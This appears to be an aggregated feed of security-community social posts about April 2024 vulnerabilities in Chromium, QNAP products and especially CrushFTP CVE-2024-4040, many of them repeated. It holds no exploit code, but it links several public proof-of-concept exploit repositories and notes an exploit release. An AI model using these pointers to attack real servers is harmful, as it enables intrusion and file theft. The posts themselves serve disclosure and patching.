  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3844(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T03:30:22

2 posts

Inappropriate implementation in Extensions in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-32764
(9.9 CRITICAL)

EPSS: 0.04%

updated 2024-04-26T15:32:22.523000

2 posts

A missing authentication for critical function vulnerability has been reported to affect myQNAPcloud Link. If exploited, the vulnerability could allow users with the privilege level of some functionality via a network. We have already fixed the vulnerability in the following version: myQNAPcloud Link 2.4.51 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-32766
(10.0 CRITICAL)

EPSS: 0.04%

updated 2024-04-26T15:32:22.523000

2 posts

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-27124
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-26T15:30:34

2 posts

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-4040
(10.0 CRITICAL)

EPSS: 1.60%

updated 2024-04-26T15:25:47.270000

54 posts

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

7 repos

https://github.com/Mufti22/CVE-2024-4040

https://github.com/Mohammaddvd/CVE-2024-4040

https://github.com/rbih-boulanouar/CVE-2024-4040

https://github.com/tucommenceapousser/CVE-2024-4040-Scanner

https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC

https://github.com/Praison001/CVE-2024-4040-CrushFTP-server

https://github.com/airbus-cert/CVE-2024-4040

jos1264@social.skynetcloud.site at 2024-04-26T15:10:05.000Z ##

Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day securityweek.com/over-1400-cru #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay

##

jos1264@social.skynetcloud.site at 2024-04-26T15:10:04.000Z ##

Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day securityweek.com/over-1400-cru #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay

##

h4sh at 2024-04-23T00:54:13.064Z ##

Here's a template to detect potentially unpatched 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

##

h4sh at 2024-04-22T19:35:57.897Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

##

h4sh@infosec.exchange at 2024-04-23T00:54:13.000Z ##

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

#CVE20244040 #CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-22T19:35:57.000Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

##

screaminggoat at 2024-04-24T17:35:09.592Z ##

While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 cisa.gov/news-events/alerts/20

##

screaminggoat at 2024-04-23T15:40:25.606Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

##

h4sh at 2024-04-23T09:37:49.606Z ##

Okay, other than the vendor's email to their customers I have not seen any proof that the bug is unauthenticated.

Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6

##

h4sh at 2024-04-23T00:54:13.064Z ##

Here's a template to detect potentially unpatched 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

##

screaminggoat at 2024-04-22T23:22:35.314Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

##

screaminggoat at 2024-04-22T20:06:45.150Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

##

h4sh at 2024-04-22T19:35:57.897Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

##

screaminggoat@infosec.exchange at 2024-04-23T15:40:25.000Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation

##

h4sh@infosec.exchange at 2024-04-23T09:37:49.000Z ##

Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.

Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6

#CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-23T00:54:13.000Z ##

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

#CVE20244040 #CVE_2024_4040

##

simontsui@infosec.exchange at 2024-04-22T23:22:35.000Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation

##

simontsui@infosec.exchange at 2024-04-22T20:06:45.000Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-22T19:35:57.000Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

##

screaminggoat at 2024-04-24T17:35:09.592Z ##

While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 cisa.gov/news-events/alerts/20

##

screaminggoat at 2024-04-23T15:40:25.606Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

##

h4sh at 2024-04-23T09:37:49.606Z ##

Okay, other than the vendor's email to their customers I have not seen any proof that the bug is unauthenticated.

Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6

##

h4sh at 2024-04-23T00:54:13.064Z ##

Here's a template to detect potentially unpatched 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

##

screaminggoat at 2024-04-22T23:22:35.314Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

##

screaminggoat at 2024-04-22T20:06:45.150Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

##

h4sh at 2024-04-22T19:35:57.897Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

##

screaminggoat@infosec.exchange at 2024-04-23T15:40:25.000Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation

##

h4sh@infosec.exchange at 2024-04-23T09:37:49.000Z ##

Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.

Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6

#CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-23T00:54:13.000Z ##

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

#CVE20244040 #CVE_2024_4040

##

simontsui@infosec.exchange at 2024-04-22T23:22:35.000Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation

##

simontsui@infosec.exchange at 2024-04-22T20:06:45.000Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-22T19:35:57.000Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

##

jos1264@social.skynetcloud.site at 2024-04-26T15:10:05.000Z ##

Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day securityweek.com/over-1400-cru #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay

##

jos1264@social.skynetcloud.site at 2024-04-26T15:10:04.000Z ##

Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day securityweek.com/over-1400-cru #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay

##

h4sh at 2024-04-23T00:54:13.064Z ##

Here's a template to detect potentially unpatched 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

##

h4sh at 2024-04-22T19:35:57.897Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

##

h4sh@infosec.exchange at 2024-04-23T00:54:13.000Z ##

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

#CVE20244040 #CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-22T19:35:57.000Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

##

jos1264@social.skynetcloud.site at 2024-04-26T19:30:04.000Z ##

CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) fortiguard.fortinet.com/threat

##

catc0n at 2024-04-24T20:45:58.152Z ##

Rapid7 now has a full technical analysis of CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) attackerkb.com/topics/20oYjlmf

##

screaminggoat at 2024-04-23T22:34:37.392Z ##

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

##

h4sh at 2024-04-23T22:32:59.637Z ##

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

cve.org/CVERecord?id=CVE-2024-

> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

##

catc0n at 2024-04-23T15:43:34.634Z ##

Rapid7 researcher @fuzz analyzed CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. rapid7.com/blog/post/2024/04/2

##

h4sh at 2024-04-23T12:56:51.605Z ##

Exploit from airbus-cert is out for CVE-2024-4040

Expect more in the wild exploitation in the coming days.. infosec.exchange/@wvu/11232021

##

wvu at 2024-04-23T11:06:48.635Z ##

h/t @JohnHammond github.com/airbus-cert/CVE-202

##

jos1264@social.skynetcloud.site at 2024-04-23T10:15:03.000Z ##

CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) helpnetsecurity.com/2024/04/23 #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP

##

campuscodi@mastodon.social at 2024-04-22T23:14:42.000Z ##

The CrushFTP zero-day is now CVE-2024-4040

nvd.nist.gov/vuln/detail/CVE-2

##

catc0n@infosec.exchange at 2024-04-24T20:45:58.000Z ##

Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) attackerkb.com/topics/20oYjlmf

##

screaminggoat@infosec.exchange at 2024-04-23T22:34:37.000Z ##

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

##

h4sh@infosec.exchange at 2024-04-23T22:32:59.000Z ##

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

cve.org/CVERecord?id=CVE-2024-

